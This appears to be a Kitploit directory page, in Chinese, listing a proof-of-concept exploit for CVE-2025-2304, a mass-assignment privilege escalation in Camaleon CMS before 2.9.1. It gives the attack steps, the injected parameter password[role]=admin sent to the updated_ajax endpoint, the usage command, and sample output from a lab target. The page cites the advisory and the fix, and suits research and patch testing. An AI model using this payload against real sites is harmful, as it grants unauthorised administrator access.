Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-2304-Camaleon-CMS-Mass-Assignment-Privilege-Escalation-PoC — 针对Camaleon CMS < 2.9.1中批量赋值权限提升漏洞的概念验证漏洞利用。认证的低权限用户可以通过注入角色参数提升为管理员。 | Kitploit
工具/GitHubGitHub/estebanzarate/cve-2025-2304-camaleon-cms-mass-assignment-privilege-escalation-poc
权限提升漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试错误配置
GitHubestebanzarate/cve-2025-2304-camaleon-cms-mass-assignment-privilege-escalation-poc

CVE-2025-2304-Camaleon-CMS-Mass-Assignment-Privilege-Escalation-PoC

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

针对Camaleon CMS < 2.9.1中批量赋值权限提升漏洞的概念验证漏洞利用。认证的低权限用户可以通过注入角色参数提升为管理员。

查看仓库
226个月前尚未审核

CVE-2025-2304 — Camaleon CMS 批量赋值权限提升(PoC)

Camaleon CMS < 2.9.1 中的权限提升漏洞。UsersController 中的 updated_ajax 端点未经过滤直接调用 params.require(:password).permit!,允许任意参数被批量赋值。已认证的低权限用户可以通过在密码更改请求中注入 password[role]=admin 来将权限提升为管理员。


工作原理

  1. 使用提供的凭据登录以获取有效会话。
  2. 从个人资料页面获取当前用户的 ID 和角色。
  3. 向 /admin/users/<id>/updated_ajax 发送 PATCH 请求,并在密码参数中注入 password[role]=admin。
  4. 验证角色已更新为 admin。

环境要求

  • Python 3
  • 安装依赖:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4

使用方法

root@kitploit:~
python3 exploit.py http://TARGET -u USER -p PASS

示例:

root@kitploit:~
$ python3 exploit.py http://facts.htb -u esteban -p password123
[*] Logging in as esteban...
[+] Logged in successfully
[*] User ID: 3, current role: editor
[*] Sending exploit payload...
[+] Privilege escalation successful! User is now admin.
[+] Login at http://facts.htb/admin with your credentials.

参考资料

  • CVE-2025-2304
  • Tenable Research 安全公告
  • Camaleon CMS 2.9.1 发布版本(修复)

致谢

  • 发现: Tenable Research
  • 清理与简化: Esteban Zárate
下载工具